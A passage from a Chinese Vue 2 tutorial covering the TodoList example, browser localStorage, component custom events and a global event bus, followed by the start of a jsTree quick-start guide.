    }

    li:last-child {
    border-bottom: none;
    }

    li:hover{
    background-color: #ddd;
    }

    li:hover button{
    display: block;
    }
    </style>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    <template>
    <div class="todo-header">
    <input type="text" placeholder="请输入你的任务名称,按回车键确认" v-model="title" @keyup.enter="add" />
    </div>
    </template>

    <script>
    import { nanoid } from 'nanoid'
    export default {
    name: 'MyHeader',
    // 接收从 App 传递过来的 addTodo
    props: ['addTodo'],
    data() {
    return {
    // 收集用户输入的 title
    title: ''
    }
    },
    methods: {
    add() {
    // 校验数据
    if (!this.title.trim()) return alert('输入不能为空')
    // 将用户的输入包装成一个 todo 对象
    const todoObj = { id: nanoid(), title: this.title, done: false }
    // 通知 App 组件去添加一个 todo 对象
    this.addTodo(todoObj)
    // 清空输入
    this.title = ''
    }
    },
    }
    </script>

    <style scoped>
    /*header*/
    .todo-header input {
    width: 560px;
    height: 28px;
    font-size: 14px;
    border: 1px solid #ccc;
    border-radius: 4px;
    padding: 4px 7px;
    }

    .todo-header input:focus {
    outline: none;
    border-color: rgba(82, 168, 236, 0.8);
    box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 8px rgba(82, 168, 236, 0.6);
    }
    </style>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    <template>
    <div class="todo-footer" v-show="total">
    <label>
    <!-- <input type="checkbox" :checked="isAll" @change="checkAll"/> -->
    <input type="checkbox" v-model="isAll"/>
    </label>
    <span>
    <span>已完成{{doneTotal}}</span> / 全部{{total}}
    </span>
    <button class="btn btn-danger" @click="clearAll">清除已完成任务</button>
    </div>
    </template>

    <script>
    export default {
    name:'MyFooter',
    props:['todos','checkAllTodo','clearAllTodo'],
    computed: {
    //总数
    total(){
    return this.todos.length
    },
    //已完成数
    doneTotal(){
    //此处使用reduce方法做条件统计
    /* const x = this.todos.reduce((pre,current)=>{
    console.log('@',pre,current)
    return pre + (current.done ? 1 : 0)
    },0) */
    //简写
    return this.todos.reduce((pre,todo)=> pre + (todo.done ? 1 : 0) ,0)
    },
    //控制全选框
    isAll:{
    //全选框是否勾选
    get(){
    return this.doneTotal === this.total && this.total > 0
    },
    //isAll被修改时set被调用
    set(value){
    this.checkAllTodo(value)
    }
    }
    },
    methods: {
    /* checkAll(e){
    this.checkAllTodo(e.target.checked)
    } */
    //清空所有已完成
    clearAll(){
    this.clearAllTodo()
    }
    },
    }
    </script>

    <style scoped>
    /*footer*/
    .todo-footer {
    height: 40px;
    line-height: 40px;
    padding-left: 6px;
    margin-top: 5px;
    }

    .todo-footer label {
    display: inline-block;
    margin-right: 20px;
    cursor: pointer;
    }

    .todo-footer label input {
    position: relative;
    top: -1px;
    vertical-align: middle;
    margin-right: 5px;
    }

    .todo-footer button {
    float: right;
    margin-top: 5px;
    }
    </style>
    graph TD  A[App.vue]  B[MyHeader.vue]  C[MyFooter.vue]  D[MyList.vue]  E[MyItem.vue]  A -->|addTodo| B  A -->|todos, checkAllTodo, clearAllTodo| C  A -->|todos, checkTodo, deleteTodo| D  D -->|todo, checkTodo, deleteTodo| E

    078 浏览器本地存储

    ​WebStorage 分为 SessionStorageLocalStorage

    1. 存储内容大小一般支持 5MB 左右(不同浏览器可能还不一样)

    2. 浏览器端通过 Window.sessionStorageWindow.localStorage 属性来实现本地存储机制。

    3. 相关 API:

      • xxxxxStorage.setItem("key',"value");

        该方法接受一个键和值作为参数,会把键值对添加到存储中,如果键名存在,则更新其对应的值。

      • xxxxxStorage.getItem("person');

        该方法接受一个键名作为参数,返回键名对应的值。

      • xxxxxStorage.removeItem('key");

        该方法接受一个键名作为参数,并把该键名从存储中删除。

      • xxxxxStorage.clear();

        该方法会清空存储中的所有数据。

    4. 备注:

      • SesslonStorage 存储的内容会随着浏览器窗口关闭而消失
      • Localstorage 存储的内容,需要手动清除才会消失
      • xxxxxstorage.getItem(xxx) 如果 xxx 对应的 value 获取不到,那么 getltem 的返回值是 null
      • JSON.parse(null) 的结果依然是 null
    方法说明
    setItem(key, value)保存一对键值对数据。值会被转换为字符串存储。
    getItem(key)获取指定键的值。如果键不存在,返回 null
    removeItem(key)删除指定键的键值对。
    clear()清空存储中的所有数据。
    key(index)根据索引获取存储中的键名。索引从 0 开始。如果索引超出范围,返回 null
    length返回存储中键值对的数量(作为属性,而非方法)。

    079 TodoList 本地存储

    ​在 070-077 的 TodoList 案例下的 App.vue,给 todos 修改 data()(读取 localStorage 载入到 todos 中)和 watch(深度监视,修改 todos 的值时同时修改 localStorage 里的值)。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    import MyHeader from './components/MyHeader'
    import MyList from './components/MyList'
    import MyFooter from './components/MyFooter.vue'

    export default {
    name: 'App',
    components: { MyHeader, MyList, MyFooter },
    data() {
    return {
    // 由于 todos 是 MyHeader 组件和 MyFooter 组件都在使用,所以放在 App 中(状态提升)
    todos: JSON.parse(localStorage.getItem('todos')) || []
    }
    },
    methods: {
    ...
    },
    watch: {
    todos: {
    handler(value) {
    console.log('todos');
    localStorage.setItem('todos', JSON.stringify(value));
    },
    deep: true
    }
    }

    }

    080-082 组件自定义事件-绑定-解绑-总结

    组件的自定义事件:

    1. 一种组件间通信的方式,适用于:子组件 =>父组件

    2. 使用场景:A 是父组件,B 是子组件,B 想给 A 传数据,那么就要在 A 中给 B 绑定自定义事件(事件的回调在 A 中)

    3. 绑定自定义事件:

      • 第一种方式,在父组件中:<Demo @atguigu="test"/><Demo v-on:atguigu="test"/>

      • 第二种方式,在父组件中:

        1
        2
        3
        4
        5
        <Demo ref="demo"/>
        ...
        mounted() {
        this.$refs.xxx.$on('atguigu',this.test)
        }
      • 若想让自定义事件只能触发一次,可以使用 once 修饰符,或 $once 方法。

    4. 触发自定义事件:this.$emit('atguigu', 数据)

    5. 解绑自定义事件:this.$off('atguigu')

    6. 组件上也可以绑定原生 DOM 事件,需要使用 native 修饰符

    7. 注意:通过 this.\$refs.x.\$on('atguigu', 回调) 绑定自定义事件时,回调要么配置在 methods 中,要么用箭头函数,否则 this 指向会出问题!

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    <template>
    <div class="app">
    <h1>{{ msg }},学生姓名是:{{ studentName }}</h1>
    <!-- 通过父组件给子组件传递函数类型的 props 实现:子给父传递数据 -->
    <School :getSchoolName="getSchoolName"/>
    <!-- 通过父组件给子组件绑定一个自定义事件实现:子给父传递数据(第一种写法:使用 @ 或 v-on) -->
    <Student v-on:atguigu="getStudentName" @demo="m1"/>
    <!-- <Student @atguigu="getStudentName"/> -->
    <!-- 通过父组件给子组件绑定一个自定义事件实现:子给父传递数据(第二种写法:使用 ref) -->
    <!-- <Student ref="student"/> -->
    </div>
    </template>

    <script>
    import School from './components/School.vue';
    import Student from './components/Student.vue';

    export default {
    name: 'App',
    components: { School, Student },
    data() {
    return {
    msg: '你好。',
    studentName: ''
    }
    },
    methods: {
    getSchoolName(name) {
    console.log('App 收到学校名:', name)
    },
    getStudentName(name, ...params) {
    this.studentName = name
    console.log('getStudentName() 被调用了!', name, params)
    },
    m1() {
    console.log('demo 事件被触发了!')
    }
    },
    mounted() {
    // 绑定自定义事件
    // this.$refs.student.$on('atguigu', this.getStudentName)
    // 绑定自定义事件(一次性)
    // this.$refs.student.$once('atguigu', this.getStudentName)
    }
    }
    </script>

    <style>
    .app {
    padding: 5px;
    background-color: gray;
    }
    </style>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    <template>
    <div class="school">
    <h2>学校名称:{{ name }}</h2>
    <h2>学校地址:{{ address }}</h2>
    <button @click="sendSchoolName">把学校名给 App</button>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'School',
    props: ['getSchoolName'],
    data() {
    return {
    name: 'FJNU',
    address: 'Fuzhou'
    }
    },
    methods: {
    sendSchoolName() {
    this.getSchoolName(this.name)
    }
    }
    }
    </script>

    <style scoped>
    .school {
    padding: 5px;
    background-color: skyblue;
    }
    </style>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    <template>
    <div class="student">
    <h2>学生姓名:{{ name }}</h2>
    <h2>学生性别:{{ sex }}</h2>
    <h2>当前求和为:{{ number }}</h2>
    <button @click="add">点我 number++</button>
    <button @click="sendStudentName">把学生名给 App</button>
    <button @click="unbind">解绑 atguigu 事件</button>
    <button @click="death">销毁当前 Student 组件的实例(vc)</button>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    return {
    name: '张三',
    sex: '男',
    number: 0
    }
    },
    methods: {
    add() {
    console.log('add() 被调用了!')
    this.number++
    },
    sendStudentName() {
    // 触发 Student 组件实例上的 atguigu 事件
    this.$emit('atguigu', this.name, 123, 456, 789)
    this.$emit('demo')
    },
    unbind() {
    // 解绑一个自定义事件
    // this.$off('atguigu')
    // 解绑多个自定义事件
    // this.$off(['atguigu', 'demo'])
    // 解绑所有自定义事件
    this.$off()
    },
    death() {
    // 销毁了当前 Student 组件的实例,销毁后所有 Student 实例的自定义事件全都不奏效。
    this.$destroy()
    }
    }
    }
    </script>

    <style lang="less" scoped>
    .student {
    padding: 5px;
    margin-top: 20px;
    background-color: pink;
    }
    </style>

    083 TodoList 案例-自定义事件

    ​对于子对象向父对象通过调用函数传递数据,不再使用 props,而是使用 this.$emit()(以触发自定义事件)。

    graph TD  A[App.vue]  B[MyHeader.vue]  C[MyFooter.vue]  D[MyList.vue]  E[MyItem.vue]  A -->|addTodo| B  C -->|checkAllTodo, clearAllTodo| A  A -->|todos| C  A -->|todos| D  D -->|checkTodo, deleteTodo| A  D -->|todo, checkTodo, deleteTodo| E

    ​父对象不再写成 :checkAllTodo="checkAllTodo" 的形式,而是改为 @checkAllTodo="checkAllTodo"(以绑定自定义事件)。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    <template>
    <div id="root">
    <div class="todo-container">
    <div class="todo-wrap">
    <MyHeader @addTodo="addTodo" />
    <MyList :todos="todos" :checkTodo="checkTodo" :deleteTodo="deleteTodo" />
    <MyFooter :todos="todos" @checkAllTodo="checkAllTodo" @clearAllTodo="clearAllTodo" />
    </div>
    </div>
    </div>
    </template>

    <script>
    import MyHeader from './components/MyHeader'
    import MyList from './components/MyList'
    import MyFooter from './components/MyFooter.vue'

    export default {
    name: 'App',
    components: { MyHeader, MyList, MyFooter },
    data() {
    return {
    // 由于 todos 是 MyHeader 组件和 MyFooter 组件都在使用,所以放在 App 中(状态提升)
    todos: [
    { id: '001', title: '抽烟', done: true },
    { id: '002', title: '喝酒', done: false },
    { id: '003', title: '开车', done: true }
    ]
    }
    },
    methods: {
    // 添加一个 todo
    addTodo(todoObj) {
    this.todos.unshift(todoObj)
    },
    // 勾选 or 取消勾选一个 todo
    checkTodo(id) {
    this.todos.forEach((todo) => {
    if (todo.id === id) todo.done = !todo.done
    })
    },
    // 删除一个 todo
    deleteTodo(id) {
    this.todos = this.todos.filter(todo => todo.id !== id)
    },
    // 全选 or 取消全选
    checkAllTodo(done) {
    this.todos.forEach((todo) => {
    todo.done = done
    })
    },
    // 清除所有已经完成的 todo
    clearAllTodo() {
    this.todos = this.todos.filter((todo) => {
    return !todo.done
    })
    }
    }
    }
    </script>

    <style>
    /*base*/
    body {
    background: #fff;
    }

    .btn {
    display: inline-block;
    padding: 4px 12px;
    margin-bottom: 0;
    font-size: 14px;
    line-height: 20px;
    text-align: center;
    vertical-align: middle;
    cursor: pointer;
    box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.05);
    border-radius: 4px;
    }

    .btn-danger {
    color: #fff;
    background-color: #da4f49;
    border: 1px solid #bd362f;
    }

    .btn-danger:hover {
    color: #fff;
    background-color: #bd362f;
    }

    .btn:focus {
    outline: none;
    }

    .todo-container {
    width: 600px;
    margin: 0 auto;
    }

    .todo-container .todo-wrap {
    padding: 10px;
    border: 1px solid #ddd;
    border-radius: 5px;
    }
    </style>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    <template>
    <div class="todo-header">
    <input type="text" placeholder="请输入你的任务名称,按回车键确认" v-model="title" @keyup.enter="add" />
    </div>
    </template>

    <script>
    import { nanoid } from 'nanoid'
    export default {
    name: 'MyHeader',
    data() {
    return {
    // 收集用户输入的 title
    title: ''
    }
    },
    methods: {
    add() {
    // 校验数据
    if (!this.title.trim()) return alert('输入不能为空')
    // 将用户的输入包装成一个 todo 对象
    const todoObj = { id: nanoid(), title: this.title, done: false }
    // 通知 App 组件去添加一个 todo 对象
    this.$emit('addTodo', todoObj)
    // this.addTodo(todoObj)
    // 清空输入
    this.title = ''
    }
    },
    }
    </script>

    <style scoped>
    /*header*/
    .todo-header input {
    width: 560px;
    height: 28px;
    font-size: 14px;
    border: 1px solid #ccc;
    border-radius: 4px;
    padding: 4px 7px;
    }

    .todo-header input:focus {
    outline: none;
    border-color: rgba(82, 168, 236, 0.8);
    box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 8px rgba(82, 168, 236, 0.6);
    }
    </style>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    <template>
    <div class="todo-footer" v-show="total">
    <label>
    <!-- <input type="checkbox" :checked="isAll" @change="checkAll"/> -->
    <input type="checkbox" v-model="isAll"/>
    </label>
    <span>
    <span>已完成{{doneTotal}}</span> / 全部{{total}}
    </span>
    <button class="btn btn-danger" @click="clearAll">清除已完成任务</button>
    </div>
    </template>

    <script>
    export default {
    name:'MyFooter',
    props:['todos','checkAllTodo','clearAllTodo'],
    computed: {
    //总数
    total(){
    return this.todos.length
    },
    //已完成数
    doneTotal(){
    //此处使用reduce方法做条件统计
    /* const x = this.todos.reduce((pre,current)=>{
    console.log('@',pre,current)
    return pre + (current.done ? 1 : 0)
    },0) */
    //简写
    return this.todos.reduce((pre,todo)=> pre + (todo.done ? 1 : 0) ,0)
    },
    //控制全选框
    isAll:{
    //全选框是否勾选
    get(){
    return this.doneTotal === this.total && this.total > 0
    },
    //isAll被修改时set被调用
    set(value){
    // this.checkAllTodo(value)
    this.$emit('checkAllTodo', value)
    }
    }
    },
    methods: {
    /* checkAll(e){
    this.checkAllTodo(e.target.checked)
    } */
    //清空所有已完成
    clearAll(){
    // this.clearAllTodo()
    this.$emit('clearAllTodo')
    }
    },
    }
    </script>

    <style scoped>
    /*footer*/
    .todo-footer {
    height: 40px;
    line-height: 40px;
    padding-left: 6px;
    margin-top: 5px;
    }

    .todo-footer label {
    display: inline-block;
    margin-right: 20px;
    cursor: pointer;
    }

    .todo-footer label input {
    position: relative;
    top: -1px;
    vertical-align: middle;
    margin-right: 5px;
    }

    .todo-footer button {
    float: right;
    margin-top: 5px;
    }
    </style>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    <template>
    <ul class="todo-main">
    <MyItem v-for="todoObj in todos" :key="todoObj.id" :todo="todoObj" :checkTodo="checkTodo"
    :deleteTodo="deleteTodo" />
    </ul>
    </template>

    <script>
    import MyItem from './MyItem'

    export default {
    name: 'MyList',
    components: { MyItem },
    // 声明接收 App 传递过来的数据,其中 todos 是自己用的,checkTodo 和 deleteTodo 是给子组件 MyItem 用的
    props: ['todos', 'checkTodo', 'deleteTodo']
    }
    </script>

    <style scoped>
    /*main*/
    .todo-main {
    margin-left: 0px;
    border: 1px solid #ddd;
    border-radius: 2px;
    padding: 0px;
    }

    .todo-empty {
    height: 40px;
    line-height: 40px;
    border: 1px solid #ddd;
    border-radius: 2px;
    padding-left: 5px;
    margin-top: 10px;
    }
    </style>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    <template>
    <li>
    <label>
    <input type="checkbox" :checked="todo.done" @change="handleCheck(todo.id)"/>
    <!-- 如下代码也能实现功能,但是不太推荐,因为有点违反原则,因为修改了 props -->
    <!-- <input type="checkbox" v-model="todo.done"/> -->
    <span>{{todo.title}}</span>
    </label>
    <button class="btn btn-danger" @click="handleDelete(todo.id)">删除</button>
    </li>
    </template>

    <script>
    export default {
    name:'MyItem',
    // 声明接收 todo、checkTodo、deleteTodo
    props:['todo','checkTodo','deleteTodo'],
    methods: {
    // 勾选 or 取消勾选
    handleCheck(id){
    //通知 App 组件将对应的 todo 对象的 done 值取反
    this.checkTodo(id)
    },
    // 删除
    handleDelete(id){
    if(confirm('确定删除吗?')){
    // 通知 App 组件将对应的 todo 对象删除
    this.deleteTodo(id)
    }
    }
    },
    }
    </script>

    <style scoped>
    /*item*/
    li {
    list-style: none;
    height: 36px;
    line-height: 36px;
    padding: 0 5px;
    border-bottom: 1px solid #ddd;
    }

    li label {
    float: left;
    cursor: pointer;
    }

    li label li input {
    vertical-align: middle;
    margin-right: 6px;
    position: relative;
    top: -1px;
    }

    li button {
    float: right;
    display: none;
    margin-top: 3px;
    }

    li:before {
    content: initial;
    }

    li:last-child {
    border-bottom: none;
    }

    li:hover{
    background-color: #ddd;
    }

    li:hover button{
    display: block;
    }
    </style>

    084-085 全局事件总线

    webp

    ​上图展示了全局事件总线(X)的示意图,从而实现各个组件间相互通信。X 应满足:

    1. 所有组件都能访问到
    2. 支持:$on$off$emit
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    // 引入 Vue
    import Vue from 'vue'
    // 引入 App
    import App from './App.vue'
    // 关闭 Vue 的生产提示
    Vue.config.productionTip = false

    // 创建 vm
    new Vue({
    el: '#app',
    render: h => h(App),
    beforeCreate() {
    Vue.prototype.$bus = this; // 安装全局事件总线
    }
    })
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    <template>
    <div>
    <Student></Student>
    <hr>
    <School></School>
    </div>
    </template>

    <script>
    import Student from './components/Student.vue'
    import School from './components/School.vue'

    export default {
    name: 'App',
    components: {
    Student,
    School
    }
    }
    </script>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    <template>
    <div class="demo">
    <h2 class="school">学校名称:{{ name }}</h2>
    <h2>学校地址:{{ address }}</h2>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'School',
    data() {
    return {
    name: '河百带学',
    address: '河北保定',
    }
    },
    mounted() {
    //通过$on监听父组件发送的数据
    this.$bus.$on('getStudentName', (name) => {
    console.log(`我是 School 组件,收到了数据 ${name}`)
    })
    }
    }
    </script>

    <style lang="less" scoped>
    .demo {
    background-color: orange;
    .school {
    font-size: larger;
    }
    }
    </style>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    <template>
    <div class="demo">
    <h2>学生姓名:{{ name }}</h2>
    <h2>学生性别:{{ sex }}</h2>
    <button @click="sendStudentName">把学生名给 School 组件</button>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    return {
    name: '张三',
    sex: '男'
    }
    },
    methods: {
    sendStudentName() {
    //通过 this.$emit 向父组件发送数据
    this.$bus.$emit('getStudentName', this.name)
    }
    }
    }
    </script>

    <style lang="less" scoped>
    .demo {
    background-color: skyblue;
    }
    </style>

    webp

    全局事件总线(GlobalEventBus)

    1. 一种组件间通信的方式,适用于任意组件间通信。

    2. 安装全局事件总线:

      1
      2
      3
      4
      5
      6
      7
      new Vue({
      .....
      beforeCreate(){
      Vue.prototype.$bus=this //安装全局事件总线,$bus 就是当前应用的 vm
      },
      ......
      })
    3. 使用事件总线:

      • 接收数据:A 组件想接收数据,则在 A 组件中给 $bus 绑定自定义事件,事件的回调留在 A 组件自身。

        1
        2
        3
        4
        5
        6
        methods() {
        demo(data){......}
        }
        mounted() {
        this.$bus.$on('xxxx',this.demo)
        }
      • 提供数据: this.$bus.$emit('xxxx', 数据)

    4. 最好在 beforeDestroy() 钩子中,用 $off 去解绑当前组件所用到的事件。

    086 TodoList 案例-事件总线

    ​对于父传子:props,对于子传父:自定义事件。其余情况,可使用全局事件总线。

    ​这里将 TodoList 案例添加事件总线,实现 App.vueMyItem.vue 间的消息传递。

    graph TD  A[App.vue]  B[MyHeader.vue]  C[MyFooter.vue]  D[MyList.vue]  E[MyItem.vue]  F[$bus]  A -->|addTodo| B  F -->|checkTodo, deleteTodo| A  C -->|checkAllTodo, clearAllTodo| A  A -->|todos| C  A -->|todos| D  D -->|checkTodo, deleteTodo| A  E -->|checkTodo, deleteTodo| F  D -->|todo| E
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    // 引入 Vue
    import Vue from 'vue'
    // 引入 App
    import App from './App.vue'
    // 关闭 Vue 的生产提示
    Vue.config.productionTip = false

    // 创建 vm
    new Vue({
    el: '#app',
    render: h => h(App),
    beforeCreate() {
    Vue.prototype.$bus = this; // 安装全局事件总线
    }
    })
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    <template>
    <div id="root">
    <div class="todo-container">
    <div class="todo-wrap">
    <MyHeader @addTodo="addTodo" />
    <MyList :todos="todos" :checkTodo="checkTodo" :deleteTodo="deleteTodo" />
    <MyFooter :todos="todos" @checkAllTodo="checkAllTodo" @clearAllTodo="clearAllTodo" />
    </div>
    </div>
    </div>
    </template>

    <script>
    import MyHeader from './components/MyHeader'
    import MyList from './components/MyList'
    import MyFooter from './components/MyFooter.vue'

    export default {
    name: 'App',
    components: { MyHeader, MyList, MyFooter },
    data() {
    mounted() {
    this.$bus.$on('checkTodo', this.checkTodo)
    this.$bus.$on('deleteTodo', this.deleteTodo)
    },
    beforeDestroy() {
    this.$bus.$off('checkTodo', this.checkTodo)
    this.$bus.$off('deleteTodo', this.deleteTodo)
    }
    ...
    }
    ...
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    <template>
    <li>
    <label>
    <input type="checkbox" :checked="todo.done" @change="handleCheck(todo.id)"/>
    <!-- 如下代码也能实现功能,但是不太推荐,因为有点违反原则,因为修改了 props -->
    <!-- <input type="checkbox" v-model="todo.done"/> -->
    <span>{{todo.title}}</span>
    </label>
    <button class="btn btn-danger" @click="handleDelete(todo.id)">删除</button>
    </li>
    </template>

    <script>
    export default {
    name:'MyItem',
    // 声明接收 todo
    props:['todo'],
    methods: {
    // 勾选 or 取消勾选
    handleCheck(id){
    //通知 App 组件将对应的 todo 对象的 done 值取反
    // this.checkTodo(id)
    this.$bus.$emit('checkTodo', id)
    },
    // 删除
    handleDelete(id){
    if(confirm('确定删除吗?')){
    // 通知 App 组件将对应的 todo 对象删除
    // this.deleteTodo(id)
    this.$bus.$emit('deleteTodo', id)
    }
    }
    },
    }
    </script>

    ...
    ]]>
    @@ -112,7 +112,7 @@ /posts/Web-jsTree/ - 资源

    快速开始

    官方示例

    ​ 使用 CDNJS 或是本地导入的方式导入所需的文件:

    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/jstree/3.2.1/themes/default/style.min.css" />
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.12.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jstree/3.2.1/jstree.min.js"></script>

    ​ 开始第一个示例代码:

    <!DOCTYPE html>
    <html>

    <head>
    <meta charset="utf-8">
    <title>jsTree test</title>
    <!-- 2 load the theme CSS file -->
    <link rel="stylesheet" href="dist/themes/default/style.min.css" />
    </head>

    <body>
    <!-- 3setup a container element -->
    <div id="jstree">
    <!-- 创建一个容器,ID 为 jstree,用于显示树结构。 -->
    <!-- in this example the tree is populated from inline HTML -->
    <ul>
    <!-- 定义一个无序列表,用于构建树状结构的节点。 -->
    <li>Root node 1
    <ul>
    <li id="child_node_1">Child node 1</li>
    <li>Child node 2</li>
    </ul>
    </li>
    <li>Root node 2</li>
    </ul>
    </div>
    <button>demo button</button>
    <!-- 创建一个按钮,点击后会触发某些功能。 -->

    <!-- 4 include the jQuery library -->
    <script src="dist/libs/jquery.min.js"></script>
    <!-- 5 include the minified jstree source -->
    <script src="dist/jstree.min.js"></script>
    <script>
    $(function () {
    // 6 create an instance when the DOM is ready
    $('#jstree').jstree(); // 初始化 #jstree 元素为 jsTree 实例,生成树状结构。
    // 7 bind to events triggered on the tree
    $('#jstree').on("changed.jstree", function (e, data) { // 绑定事件处理程序,当树的选择发生改变时,会将选中的节点 ID 打印到控制台。
    console.log(data.selected);
    });
    // 8 interact with the tree - either way is OK
    $('button').on('click', function () { // 为按钮绑定点击事件,点击时执行以下操作:
    $('#jstree').jstree(true).select_node('child_node_1'); // 选择 ID 为 child_node_1 的节点。
    $('#jstree').jstree('select_node', 'child_node_1'); // 选择节点的另一种方式。
    $.jstree.reference('#jstree').select_node('child_node_1'); // 通过 jsTree 的引用选择节点。
    });
    });
    </script>
    </body>

    </html>
    示例代码简介

    ​ 这段代码是一个使用 jsTree 插件创建树形结构的示例。以下是代码的主要部分解释:

    1. <!DOCTYPE html>:声明 HTML 文档类型。
    2. <head>:头部标签,用于指定文档相关信息。
      • <meta charset="utf-8">:指定文档使用 UTF-8 字符编码。
      • <title>jsTree test</title>:设置页面标题。
      • <link rel="stylesheet" href="dist/themes/default/style.min.css" />:引入样式文件。
    3. <body>:主体标签,包含页面内容。
      • <div id="jstree">:设置一个容器元素,用来显示树形结构。
        • <ul>:无序列表,用来存放树的节点。
          • <li>:列表项,代表树的节点。
            • <ul>:嵌套的列表项,表示子节点。
              • <li id="child_node_1">Child node 1</li>:具体的子节点。
      • <button>demo button</button>:按钮元素,用来演示与树交互的操作。
    4. <script src="dist/libs/jquery.min.js"></script>:引入 jQuery 库。
    5. <script src="dist/jstree.min.js"></script>:引入 jsTree 插件。
    6. $(function () { ... });:使用 jQuery 的 DOM 就绪函数,确保在 DOM 加载完成后执行代码。
      • $('#jstree').jstree();:将 #jstree 元素初始化为一个 jsTree 实例。
      • $('#jstree').on("changed.jstree", function (e, data) { ... });:绑定 changed.jstree 事件的回调函数,当树的选中节点发生变化时触发。
      • $('button').on('click', function () { ... });:给按钮绑定点击事件的回调函数。
